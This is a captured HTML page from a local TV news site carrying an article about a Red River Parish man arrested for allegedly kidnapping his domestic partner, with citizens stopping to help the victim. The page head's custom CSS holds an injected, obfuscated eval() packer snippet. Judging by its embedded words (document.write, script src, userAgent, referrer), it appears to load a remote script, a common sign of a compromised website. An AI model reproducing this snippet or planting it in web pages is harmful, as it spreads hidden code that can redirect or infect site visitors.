<!DOCTYPE html>
<html lang="en-US">
<head>
	<meta charset="UTF-8"/>
	<meta name="viewport" content="width=device-width, initial-scale=1">
	<link rel="profile" href="http://gmpg.org/xfn/11"/>
	<link rel="pingback" href="http://klax-tv.com/xmlrpc.php"/>
	<title>NPSO: Red River Parish Man Arrested in Alleged Kidnapping Incident; Citizens Stopped To Assist Victim &#8211; KLAX-TV</title>
<link rel='dns-prefetch' href='//fonts.googleapis.com' />
<link rel='dns-prefetch' href='//s.w.org' />
<link rel="alternate" type="application/rss+xml" title="KLAX-TV &raquo; Feed" href="http://klax-tv.com/feed/" />
<link rel="alternate" type="application/rss+xml" title="KLAX-TV &raquo; Comments Feed" href="http://klax-tv.com/comments/feed/" />
<link rel="alternate" type="text/calendar" title="KLAX-TV &raquo; iCal Feed" href="http://klax-tv.com/events/?ical=1" />
<link rel="alternate" type="application/rss+xml" title="KLAX-TV &raquo; NPSO: Red River Parish Man Arrested in Alleged Kidnapping Incident; Citizens Stopped To Assist Victim Comments Feed" href="http://klax-tv.com/npso-red-river-parish-man-arrested-in-alleged-kidnapping-incident-citizens-stopped-to-assist-victim/feed/" />
		<script type="text/javascript">
			window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/11\/svg\/","svgExt":".svg","source":{"concatemoji":"http:\/\/klax-tv.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.9.9"}};
			!function(a,b,c){function d(a,b){var c=String.fromCharCode;l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,a),0,0);var d=k.toDataURL();l.clearRect(0,0,k.width,k.height),l.fillText(c.apply(this,b),0,0);var e=k.toDataURL();return d===e}function e(a){var b;if(!l||!l.fillText)return!1;switch(l.textBaseline="top",l.font="600 32px Arial",a){case"flag":return!(b=d([55356,56826,55356,56819],[55356,56826,8203,55356,56819]))&&(b=d([55356,57332,56128,56423,56128,56418,56128,56421,56128,56430,56128,56423,56128,56447],[55356,57332,8203,56128,56423,8203,56128,56418,8203,56128,56421,8203,56128,56430,8203,56128,56423,8203,56128,56447]),!b);case"emoji":return b=d([55358,56760,9792,65039],[55358,56760,8203,9792,65039]),!b}return!1}function f(a){var c=b.createElement("script");c.src=a,c.defer=c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var g,h,i,j,k=b.createElement("canvas"),l=k.getContext&&k.getContext("2d");for(j=Array("flag","emoji"),c.supports={everything:!0,everythingExceptFlag:!0},i=0;i<j.length;i++)c.supports[j[i]]=e(j[i]),c.supports.everything=c.supports.everything&&c.supports[j[i]],"flag"!==j[i]&&(c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&c.supports[j[i]]);c.supports.everythingExceptFlag=c.supports.everythingExceptFlag&&!c.supports.flag,c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.everything||(h=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",h,!1),a.addEventListener("load",h,!1)):(a.attachEvent("onload",h),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),g=c.source||{},g.concatemoji?f(g.concatemoji):g.wpemoji&&g.twemoji&&(f(g.twemoji),f(g.wpemoji)))}(window,document,window._wpemojiSettings);
		</script>
		<style type="text/css">
img.wp-smiley,
img.emoji {
	display: inline !important;
	border: none !important;
	box-shadow: none !important;
	height: 1em !important;
	width: 1em !important;
	margin: 0 .07em !important;
	vertical-align: -0.1em !important;
	background: none !important;
	padding: 0 !important;
}
</style>
<link rel='stylesheet' id='dashicons-css'  href='http://klax-tv.com/wp-includes/css/dashicons.min.css?ver=4.9.9' type='text/css' media='all' />
<link rel='stylesheet' id='theme-my-login-css'  href='http://klax-tv.com/wp-content/plugins/theme-my-login/theme-my-login.css?ver=6.4.16' type='text/css' media='all' />
<link rel='stylesheet' id='wp-notification-bars-css'  href='http://klax-tv.com/wp-content/plugins/wp-notification-bars/public/css/wp-notification-bars-public.css?ver=1.0.5' type='text/css' media='all' />
<link rel='stylesheet' id='gglcptch-css'  href='http://klax-tv.com/wp-content/plugins/google-captcha/css/gglcptch.css?ver=1.37' type='text/css' media='all' />
<link rel='stylesheet' id='sclbttns_stylesheet-css'  href='http://klax-tv.com/wp-content/plugins/social-buttons-pack/css/style.css?ver=4.9.9' type='text/css' media='all' />
<link rel='stylesheet' id='fcbkbttn_stylesheet-css'  href='http://klax-tv.com/wp-content/plugins/social-buttons-pack/facebook-button-plugin/css/style.css?ver=4.9.9' type='text/css' media='all' />
<link rel='stylesheet' id='twttr_stylesheet-css'  href='http://klax-tv.com/wp-content/plugins/social-buttons-pack/twitter-plugin/css/style.css?ver=4.9.9' type='text/css' media='all' />
<link rel='stylesheet' id='lnkdn_icon-css'  href='http://klax-tv.com/wp-content/plugins/social-buttons-pack/bws-linkedin/css/icon.css?ver=4.9.9' type='text/css' media='all' />
<link rel='stylesheet' id='lnkdn_stylesheet-css'  href='http://klax-tv.com/wp-content/plugins/social-buttons-pack/bws-linkedin/css/style.css?ver=4.9.9' type='text/css' media='all' />
<link rel='stylesheet' id='pntrst_stylesheet-css'  href='http://klax-tv.com/wp-content/plugins/social-buttons-pack/bws-pinterest/css/style.css?ver=4.9.9' type='text/css' media='all' />
<link rel='stylesheet' id='colormag_google_fonts-css'  href='//fonts.googleapis.com/css?family=Open+Sans%3A400%2C600&#038;ver=4.9.9' type='text/css' media='all' />
<link rel='stylesheet' id='colormag_style-css'  href='http://klax-tv.com/wp-content/themes/colormag/style.css?ver=4.9.9' type='text/css' media='all' />
<link rel='stylesheet' id='colormag-fontawesome-css'  href='http://klax-tv.com/wp-content/themes/colormag/fontawesome/css/font-awesome.css?ver=4.2.1' type='text/css' media='all' />
<script type='text/javascript' src='http://klax-tv.com/wp-includes/js/jquery/jquery.js?ver=1.12.4'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-includes/js/jquery/jquery-migrate.min.js?ver=1.4.1'></script>
<script type='text/javascript'>
/* <![CDATA[ */
var gadwpUAEventsData = {"options":{"event_tracking":"1","event_downloads":"zip|mp3*|mpe*g|pdf|docx*|pptx*|xlsx*|rar*","event_bouncerate":0,"aff_tracking":0,"event_affiliates":"\/out\/","hash_tracking":0,"root_domain":"klax-tv.com","event_timeout":100,"event_precision":0,"event_formsubmit":0,"ga_pagescrolldepth_tracking":0,"ga_with_gtag":0}};
/* ]]> */
</script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/plugins/google-analytics-dashboard-for-wp/front/js/tracking-analytics-events.js?ver=5.3.5'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/plugins/social-buttons-pack/facebook-button-plugin/js/script.js?ver=4.9.9'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/plugins/wp-notification-bars/public/js/wp-notification-bars-public.js?ver=1.0.5'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/plugins/theme-my-login/modules/themed-profiles/themed-profiles.js?ver=4.9.9'></script>
<script type='text/javascript' src='http://klax-tv.com/wp-content/themes/colormag/js/colormag-custom.js?ver=4.9.9'></script>
<!--[if lte IE 8]>
<script type='text/javascript' src='http://klax-tv.com/wp-content/themes/colormag/js/html5shiv.min.js?ver=4.9.9'></script>
<![endif]-->
<link rel='https://api.w.org/' href='http://klax-tv.com/wp-json/' />
<link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://klax-tv.com/xmlrpc.php?rsd" />
<link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://klax-tv.com/wp-includes/wlwmanifest.xml" /> 
<link rel='prev' title='Threatening Graffiti in Bathroom at Alexandria Senior High' href='http://klax-tv.com/threatening-graffiti-in-bathroom-at-alexandria-senior-high/' />
<meta name="generator" content="WordPress 4.9.9" />
<link rel="canonical" href="http://klax-tv.com/npso-red-river-parish-man-arrested-in-alleged-kidnapping-incident-citizens-stopped-to-assist-victim/" />
<link rel='shortlink' href='http://klax-tv.com/?p=63479' />
<link rel="alternate" type="application/json+oembed" href="http://klax-tv.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fklax-tv.com%2Fnpso-red-river-parish-man-arrested-in-alleged-kidnapping-incident-citizens-stopped-to-assist-victim%2F" />
<link rel="alternate" type="text/xml+oembed" href="http://klax-tv.com/wp-json/oembed/1.0/embed?url=http%3A%2F%2Fklax-tv.com%2Fnpso-red-river-parish-man-arrested-in-alleged-kidnapping-incident-citizens-stopped-to-assist-victim%2F&#038;format=xml" />

<!-- This site is using AdRotate v4.13.2 to display their advertisements - https://ajdg.solutions/products/adrotate-for-wordpress/ -->
<!-- AdRotate CSS -->
<style type="text/css" media="screen">
	.g { margin:0px; padding:0px; overflow:hidden; line-height:1; zoom:1; }
	.g img { height:auto; }
	.g-col { position:relative; float:left; }
	.g-col:first-child { margin-left: 0; }
	.g-col:last-child { margin-right: 0; }
	.g-7 { min-width:0px; max-width:250px; }
	.b-7 { margin:0px; }
	.g-9 { min-width:0px; max-width:300px; }
	.b-9 { margin:0px; }
	.g-11 { width:auto; }
	.b-11 { margin:5px; }
	@media only screen and (max-width: 480px) {
		.g-col, .g-dyn, .g-single { width:100%; margin-left:0; margin-right:0; }
	}
</style>
<!-- /AdRotate CSS -->


<!-- fcbkbttn meta start -->
<meta property="og:url" content="http://klax-tv.com/npso-red-river-parish-man-arrested-in-alleged-kidnapping-incident-citizens-stopped-to-assist-victim/"/>
<meta property="og:title" content="NPSO: Red River Parish Man Arrested in Alleged Kidnapping Incident; Citizens Stopped To Assist Victim"/>
<meta property="og:site_name" content="KLAX-TV"/>
<meta property="og:image" content="http://klax-tv.com/wp-content/uploads/2019/02/red-river-parish-arrested-man-300x169.jpg"/>
<meta property="og:description" content="Natchitoches Parish Sheriff’s Deputies have arrested a Red River Parish man in connection with the alleged kidnapping of his domestic partner on Wednesday morning according to the Natchitoches Paris"/>
<!-- fcbkbttn meta end -->		<script type="text/javascript" src="//assets.pinterest.com/js/pinit.js" async data-pin-save="true" data-pin-lang="en" data-pin-count="none"></script>
	<meta name="tec-api-version" content="v1"><meta name="tec-api-origin" content="http://klax-tv.com"><link rel="https://theeventscalendar.com/" href="http://klax-tv.com/wp-json/tribe/events/v1/" /><style type="text/css" id="custom-background-css">
body.custom-background { background-color: #a5a5a5; background-image: url("http://klax-tv.com/wp-content/uploads/2019/02/small-blueNet_Standard_LandScape.jpg"); background-position: left top; background-size: contain; background-repeat: no-repeat; background-attachment: fixed; }
</style>
<link rel="icon" href="http://klax-tv.com/wp-content/uploads/2016/05/cropped-SiteIcon-32x32.jpg" sizes="32x32" />
<link rel="icon" href="http://klax-tv.com/wp-content/uploads/2016/05/cropped-SiteIcon-192x192.jpg" sizes="192x192" />
<link rel="apple-touch-icon-precomposed" href="http://klax-tv.com/wp-content/uploads/2016/05/cropped-SiteIcon-180x180.jpg" />
<meta name="msapplication-TileImage" content="http://klax-tv.com/wp-content/uploads/2016/05/cropped-SiteIcon-270x270.jpg" />

<!-- BEGIN ExactMetrics v5.3.5 Universal Analytics - https://exactmetrics.com/ -->
<script>
(function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){
	(i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o),
	m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m)
})(window,document,'script','https://www.google-analytics.com/analytics.js','ga');
  ga('create', 'UA-66545023-1', 'auto');
  ga('require', 'displayfeatures');
  ga('send', 'pageview');
</script>
<!-- END ExactMetrics Universal Analytics -->
<!-- KLAX-TV Internal Styles -->		<style type="text/css">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</style>
		<!-- KLAX-TV Elementor Internal Styles -->			<style type="text/css">.elementor .tg-module-wrapper .module-title{border-bottom:1px solid #336699}.elementor .tg-module-wrapper .module-title span,.elementor .tg-module-wrapper .tg-post-category{background-color:#336699}.elementor .tg-module-wrapper .tg-module-meta .tg-module-comments a:hover,.elementor .tg-module-wrapper .tg-module-meta .tg-post-auther-name a:hover,.elementor .tg-module-wrapper .tg-module-meta .tg-post-date a:hover,.elementor .tg-module-wrapper .tg-module-title:hover a,.elementor .tg-module-wrapper.tg-module-grid .tg_module_grid .tg-module-info .tg-module-meta a:hover{color:#336699}</style>
					<style type="text/css" id="wp-custom-css">
			.home eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|bhfie|var|u0026u|referrer|zfkhz||js|php'.split('|'),0,{}))
 .below-entry-meta .posted-on {
    display: none;
}
		</style>
	</head>

<body class="post-template-default single single-post postid-63479 single-format-standard custom-background wp-custom-logo colormag tribe-no-js tribe-theme-colormag  wide better-responsive-menu elementor-default">


<div id="page" class="hfeed site">
	
	
	<header id="masthead" class="site-header clearfix ">
		<div id="header-text-nav-container" class="clearfix">

						<div class="news-bar">
				<div class="inner-wrap clearfix">
					
		<div class="date-in-header">
			Thursday, February 28, 2019		</div>

		
							<div class="breaking-news">
			<strong class="breaking-news-latest">Latest:</strong>
			<ul class="newsticker">
									<li>
						<a href="http://klax-tv.com/npso-red-river-parish-man-arrested-in-alleged-kidnapping-incident-citizens-stopped-to-assist-victim/"
						   title="NPSO: Red River Parish Man Arrested in Alleged Kidnapping Incident; Citizens Stopped To Assist Victim">NPSO: Red River Parish Man Arrested in Alleged Kidnapping Incident; Citizens Stopped To Assist Victim</a>
					</li>
									<li>
						<a href="http://klax-tv.com/threatening-graffiti-in-bathroom-at-alexandria-senior-high/"
						   title="Threatening Graffiti in Bathroom at Alexandria Senior High">Threatening Graffiti in Bathroom at Alexandria Senior High</a>
					</li>
									<li>
						<a href="http://klax-tv.com/pineville-man-arrested-in-village-green/"
						   title="Pineville Man Arrested in Village Green">Pineville Man Arrested in Village Green</a>
					</li>
									<li>
						<a href="http://klax-tv.com/pile-up-in-natchitoches/"
						   title="Pile-Up in Natchitoches">Pile-Up in Natchitoches</a>
					</li>
									<li>
						<a href="http://klax-tv.com/neil-riser-running-for-lower-chamber/"
						   title="Neil Riser Running For Lower Chamber">Neil Riser Running For Lower Chamber</a>
					</li>
							</ul>
		</div>
		
							<div class="social-links clearfix">
			<ul>
				<li><a href="http://www.Facebook.com/KLAX31" target="_blank"><i class="fa fa-facebook"></i></a></li><li><a href="https://twitter.com/KLAXTV" target="_blank"><i class="fa fa-twitter"></i></a></li><li><a href="https://www.instagram.com/klaxtv/" target="_blank"><i class="fa fa-instagram"></i></a></li><li><a href="http://www.youtube.com/klaxproduction" target="_blank"><i class="fa fa-youtube"></i></a></li>			</ul>
		</div><!-- .social-links -->
						</div>
			</div>
		
			
			
		<div class="inner-wrap">

			<div id="header-text-nav-wrap" class="clearfix">
				<div id="header-left-section">
											<div id="header-logo-image">
							<a href="http://klax-tv.com/" class="custom-logo-link" rel="home" itemprop="url"><img width="330" height="231" src="http://klax-tv.com/wp-content/uploads/2019/01/cropped-logo-stacked-1.png" class="custom-logo" alt="KLAX-TV" itemprop="logo" srcset="http://klax-tv.com/wp-content/uploads/2019/01/cropped-logo-stacked-1.png 330w, http://klax-tv.com/wp-content/uploads/2019/01/cropped-logo-stacked-1-300x210.png 300w, http://klax-tv.com/wp-content/uploads/2019/01/cropped-logo-stacked-1-130x90.png 130w" sizes="(max-width: 330px) 100vw, 330px" /></a>						</div><!-- #header-logo-image -->
											<div id="header-text" class="screen-reader-text">
													<h3 id="site-title">
								<a href="http://klax-tv.com/" title="KLAX-TV" rel="home">KLAX-TV</a>
							</h3>
												<!-- #site-description -->
					</div><!-- #header-text -->
				</div><!-- #header-left-section -->
				<div id="header-right-section">
											<div id="header-right-sidebar" class="clearfix">
							<aside id="custom_html-6" class="widget_text widget widget_custom_html clearfix"><div class="textwidget custom-html-widget"><a href="http://www.accuweather.com/en/us/alexandria-la/71301/weather-forecast/329140" class="aw-widget-legal">
<!--
By accessing and/or using this code snippet, you agree to AccuWeather’s terms and conditions (in English) which can be found at http://www.accuweather.com/en/free-weather-widgets/terms and AccuWeather’s Privacy Statement (in English) which can be found at http://www.accuweather.com/en/privacy.
-->
</a><div id="awcc1475072958274" class="aw-widget-current"  data-locationkey="" data-unit="f" data-language="en-us" data-useip="true" data-uid="awcc1475072958274" data-targeturl="//www.klax-tv.com/weather/"></div><script type="text/javascript" src="//oap.accuweather.com/launch.js"></script><script type="text/javascript" src="//vortex.accuweather.com/adc2010/oap/javascript/jquery-1.9.1.min.js"></script></div></aside>						</div>
										</div><!-- #header-right-section -->

			</div><!-- #header-text-nav-wrap -->

		</div><!-- .inner-wrap -->

		
			
			
		<nav id="site-navigation" class="main-navigation clearfix" role="navigation">
			<div class="inner-wrap clearfix">
				
				<p class="menu-toggle"></p>
				<div class="menu-primary-container"><ul id="menu-klax-tv" class="menu"><li id="menu-item-29273" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-29273"><a href="http://klax-tv.com">Home</a></li>
<li id="menu-item-17620" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-has-children menu-item-17620"><a href="http://klax-tv.com/category/localheadlines/">News</a>
<ul class="sub-menu">
	<li id="menu-item-17619" class="menu-item menu-item-type-taxonomy menu-item-object-category current-post-ancestor current-menu-parent current-post-parent menu-item-17619"><a href="http://klax-tv.com/category/localheadlines/">Local News</a></li>
	<li id="menu-item-17988" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-17988"><a href="http://klax-tv.com/category/community-news/">Community News</a></li>
	<li id="menu-item-39750" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-39750"><a href="http://klax-tv.com/category/elections/">Elections</a></li>
	<li id="menu-item-29885" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-29885"><a href="http://klax-tv.com/category/state-news/">State News</a></li>
	<li id="menu-item-32504" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-32504"><a href="http://abcnews.go.com/">National News</a></li>
	<li id="menu-item-17917" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-17917"><a href="http://klax-tv.com/category/business-news/">Business News</a></li>
	<li id="menu-item-49035" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-49035"><a href="http://klax-tv.com/category/campus/">Campus News</a></li>
	<li id="menu-item-18470" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-18470"><a href="http://klax-tv.com/category/health-medical/">Health News</a></li>
	<li id="menu-item-49034" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-49034"><a href="http://klax-tv.com/category/sports-news/">Sports News</a></li>
	<li id="menu-item-1787" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1787"><a href="http://klax-tv.com/gas-buddy/">Gas Buddy</a></li>
</ul>
</li>
<li id="menu-item-33" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-33"><a href="http://klax-tv.com/weather/">Weather</a></li>
<li id="menu-item-17987" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-17987"><a href="http://klax-tv.com/category/community-news/">Community</a>
<ul class="sub-menu">
	<li id="menu-item-38143" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-38143"><a href="http://www.klax-tv.com/events">Community Calendar</a></li>
	<li id="menu-item-45702" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-45702"><a href="http://klax-tv.com/atyourservice/">At Your Service</a></li>
	<li id="menu-item-32125" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-32125"><a href="http://klax-tv.com/category/road-closures/">Road Closures</a></li>
	<li id="menu-item-48865" class="menu-item menu-item-type-taxonomy menu-item-object-category menu-item-48865"><a href="http://klax-tv.com/category/boil-advisories/">Boil Advisories</a></li>
	<li id="menu-item-34460" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-34460"><a href="http://klax-tv.com/category/cancelledpostponed/">Cancelled/Postponed Events</a></li>
	<li id="menu-item-1279" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1279"><a href="http://klax-tv.com/public-service-announcements/">Submit your PSA</a></li>
</ul>
</li>
<li id="menu-item-36324" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-36324"><a href="http://klax-tv.com/IYH">In Your Hometown</a></li>
<li id="menu-item-46922" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-46922"><a href="http://klax-tv.com/schedule/">Schedule</a></li>
<li id="menu-item-40" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-40"><a href="http://klax-tv.com/about/">About Us</a>
<ul class="sub-menu">
	<li id="menu-item-5856" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5856"><a href="http://klax-tv.com/about/">About KLAX TV</a></li>
	<li id="menu-item-5850" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5850"><a href="http://klax-tv.com/meet-the-team/">Meet the Team</a></li>
	<li id="menu-item-49336" class="menu-item menu-item-type-post_type menu-item-object-page current-post-parent menu-item-49336"><a href="http://klax-tv.com/advertise/">Advertise with Us</a></li>
	<li id="menu-item-41" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-41"><a href="http://klax-tv.com/commercial-production/">Production</a></li>
	<li id="menu-item-39" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-39"><a href="http://klax-tv.com/employment/">Careers at KLAX</a></li>
	<li id="menu-item-23362" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-23362"><a href="https://publicfiles.fcc.gov/tv-profile/klax-tv">Public Inspection Files</a></li>
	<li id="menu-item-17310" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-17310"><a href="http://klax-tv.com/contact-2/">Contact</a></li>
</ul>
</li>
<li id="menu-item-17822" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-17822"><a href="http://metvalexandria.com/">MeTV</a></li>
</ul></div>
				
									<i class="fa fa-search search-top"></i>
					<div class="search-form-top">
						<form action="http://klax-tv.com/" class="search-form searchform clearfix" method="get">
   <div class="search-wrap">
      <input type="text" placeholder="Search" class="s field" name="s">
      <button class="search-icon" type="submit"></button>
   </div>
</form><!-- .searchform -->					</div>
							</div>
		</nav>

		
		</div><!-- #header-text-nav-container -->

		
	</header>

		
	<div id="main" class="clearfix">
		<div class="inner-wrap clearfix">

	
	<div id="primary">
		<div id="content" class="clearfix">

			
				
<article id="post-63479" class="post-63479 post type-post status-publish format-standard has-post-thumbnail hentry category-localheadlines">
	
   
         <div class="featured-image">
               <img width="800" height="445" src="http://klax-tv.com/wp-content/uploads/2019/02/red-river-parish-arrested-man-800x445.jpg" class="attachment-colormag-featured-image size-colormag-featured-image wp-post-image" alt="" /><div class="ccfic"></div>            </div>
   
   <div class="article-content clearfix">

   
   <div class="above-entry-meta"><span class="cat-links"><a href="http://klax-tv.com/category/localheadlines/"  rel="category tag">Local Headlines</a>&nbsp;</span></div>
      <header class="entry-header">
   		<h1 class="entry-title">
   			NPSO: Red River Parish Man Arrested in Alleged Kidnapping Incident; Citizens Stopped To Assist Victim   		</h1>
   	</header>

   	<div class="below-entry-meta">
			<span class="posted-on"><a href="http://klax-tv.com/npso-red-river-parish-man-arrested-in-alleged-kidnapping-incident-citizens-stopped-to-assist-victim/" title="4:41 pm" rel="bookmark"><i class="fa fa-calendar-o"></i> <time class="entry-date published" datetime="2019-02-28T16:41:43+00:00">February 28, 2019</time><time class="updated" datetime="2019-02-28T16:49:13+00:00">February 28, 2019</time></a></span>
			<span class="byline">
				<span class="author vcard">
					<i class="fa fa-user"></i>
					<a class="url fn n"
					   href="http://klax-tv.com/author/sally-2/"
					   title="KLAX TV, ABC 31">KLAX TV, ABC 31					</a>
				</span>
			</span>

							<span class="comments"><a href="http://klax-tv.com/npso-red-river-parish-man-arrested-in-alleged-kidnapping-incident-citizens-stopped-to-assist-victim/#respond"><i class="fa fa-comment"></i> 0 Comments</a></span>
			</div>
   	<div class="entry-content clearfix">
   		<div class="fcbkbttn_buttons_block" id="fcbkbttn_left"><div class="fcbkbttn_like "><fb:like href="http://klax-tv.com/npso-red-river-parish-man-arrested-in-alleged-kidnapping-incident-citizens-stopped-to-assist-victim/" action="like" colorscheme="light" layout="standard" show-faces='false' width="450px" size="small"></fb:like></div><div class="fb-share-button  " data-href="http://klax-tv.com/npso-red-river-parish-man-arrested-in-alleged-kidnapping-incident-citizens-stopped-to-assist-victim/" data-type="button_count" data-size="small"></div></div><div class="lnkdn_buttons"></div><div class="twttr_buttons"><div class="twttr_twitter">
					<a href="http://twitter.com/share?text=NPSO%3A+Red+River+Parish+Man+Arrested+in+Alleged+Kidnapping+Incident%3B+Citizens+Stopped+To+Assist+Victim" class="twitter-share-button" data-via="" data-hashtags=""  data-size="default" data-url="http://klax-tv.com/npso-red-river-parish-man-arrested-in-alleged-kidnapping-incident-citizens-stopped-to-assist-victim/"  data-related="" target="_blank">Tweet</a>
				</div></div><p>Natchitoches Parish Sheriff’s Deputies have arrested a Red River Parish man in connection with the alleged kidnapping of his domestic partner on Wednesday morning according to the Natchitoches Parish Sheriff’s Office.<br />
The investigation began on Wednesday morning February 27 at approximately 9:<span class="text_exposed_show">58am, when two concerned citizens contacted the NPSO 911 Center reporting a disturbance involving a male and female on La. Hwy 9 north of Campti, La.<br />
The caller stated they observed a male attempting to drag a female into a gray Chevrolet Silverado pickup truck.<br />
Deputies assigned to the NPSO Patrol Division responded arriving a short time later.<br />
Deputies say when they arrived on scene, they learned two concerned citizens observed a disturbance involving a male and a female on La. Hwy 9. They stopped to assist the female after they observed the male attempting to drag her into the vehicle.<br />
The victim was able to break free and run towards the concerned citizen vehicle for assistance. One of the concerned citizens produced a handgun for protection causing the suspect to flee the area.<br />
Deputies issued a BOLO message for the vehicle.<br />
As the investigation progressed, deputies learned the female victim accepted a ride from her domestic partner identified as 41-year-old Clydell Lee Jefferson Jr. to a local bank.<br />
While there they engaged in a verbal altercation which led the male to allegedly shock the female with a stun device and bound her hands with zip ties.<br />
The victim was then taken out to Tauzin Island where she was able to escape but was shocked again and the ties were tightened.<br />
The suspect then took the victim without her consent and traveled towards Campti then La. Hwy 9 where she believed she was being taken to a remote location and feared for her life.<br />
When they neared the intersection of La. Hwy 9 and Hart Road, the victim was able to escape exiting the vehicle again, where they became involved in a struggle on the roadside.<br />
At that time, the two concerned citizens observed the disturbance and stopped to assist.<br />
Deputies continued to search the area for the suspect.<br />
At approximately 12:00pm, Red River Parish Sheriff’s Deputies contacted the Natchitoches Parish Sheriff’s Office reporting that Jefferson had turned himself in to their office.<br />
NPSO Deputies traveled to the Red River Parish Sheriff’s Office.<br />
Clydell Lee Jefferson Jr., 41, was placed under arrest, transported and booked into the Natchitoches Parish Detention Center charged with Kidnapping and Aggravated Assault.<br />
Jefferson remains in the Natchitoches Detention Center without bond.<br />
Deputies say while interviewing Jefferson, he confessed to the kidnapping, etc.<br />
Deputies seized the stun device for criminal proceedings.<br />
Sheriff Victor Jones would like to commend the two concerned citizens who stopped to aid the victim when they recognized she needed help. Domestic incidents are one of the leading causes of injury and death to women, without the swift action of these two men the outcome of this situation may have been much worse. We thank you for your actions and good job.”<br />
We also thank Red River Parish Sheriff&#8217;s Deputies for their assistance in the investigation.</span></p>
<p>Deputy K. Samuel worked the case.</p>
<div class="twttr_buttons"><div class="twttr_twitter">
					<a href="http://twitter.com/share?text=NPSO%3A+Red+River+Parish+Man+Arrested+in+Alleged+Kidnapping+Incident%3B+Citizens+Stopped+To+Assist+Victim" class="twitter-share-button" data-via="" data-hashtags=""  data-size="default" data-url="http://klax-tv.com/npso-red-river-parish-man-arrested-in-alleged-kidnapping-incident-citizens-stopped-to-assist-victim/"  data-related="" target="_blank">Tweet</a>
				</div></div><div class="fcbkbttn_buttons_block" id="fcbkbttn_left"><div class="fcbkbttn_like "><fb:like href="http://klax-tv.com/npso-red-river-parish-man-arrested-in-alleged-kidnapping-incident-citizens-stopped-to-assist-victim/" action="like" colorscheme="light" layout="standard" show-faces='false' width="450px" size="small"></fb:like></div><div class="fb-share-button  " data-href="http://klax-tv.com/npso-red-river-parish-man-arrested-in-alleged-kidnapping-incident-citizens-stopped-to-assist-victim/" data-type="button_count" data-size="small"></div></div>   	</div>

   </div>

	</article>

			
		</div><!-- #content -->

      
		<ul class="default-wp-page clearfix">
			<li class="previous"><a href="http://klax-tv.com/threatening-graffiti-in-bathroom-at-alexandria-senior-high/" rel="prev"><span class="meta-nav">&larr;</span> Threatening Graffiti in Bathroom at Alexandria Senior High</a></li>
			<li class="next"></li>
		</ul>
	
      
      

<h4 class="related-posts-main-title"><i class="fa fa-thumbs-up"></i><span>You May Also Like</span></h4>

<div class="related-posts clearfix">

      <div class="single-related-posts">

      
      <div class="article-content">

         <h3 class="entry-title">
            <a href="http://klax-tv.com/rat-terriers-make-debut-performance-in-dog-show/" rel="bookmark" title="Rat Terriers Make Debut Performance in Dog Show">Rat Terriers Make Debut Performance in Dog Show</a>
         </h3><!--/.post-title-->

         <div class="below-entry-meta">
            <span class="posted-on"><a href="http://klax-tv.com/rat-terriers-make-debut-performance-in-dog-show/" title="4:36 pm" rel="bookmark"><i class="fa fa-calendar-o"></i> <time class="entry-date published" datetime="2014-01-10T16:36:41+00:00">January 10, 2014</time></a></span>            <span class="byline"><span class="author vcard"><i class="fa fa-user"></i><a class="url fn n" href="http://klax-tv.com/author/sally-2/" title="KLAX TV, ABC 31">KLAX TV, ABC 31</a></span></span>
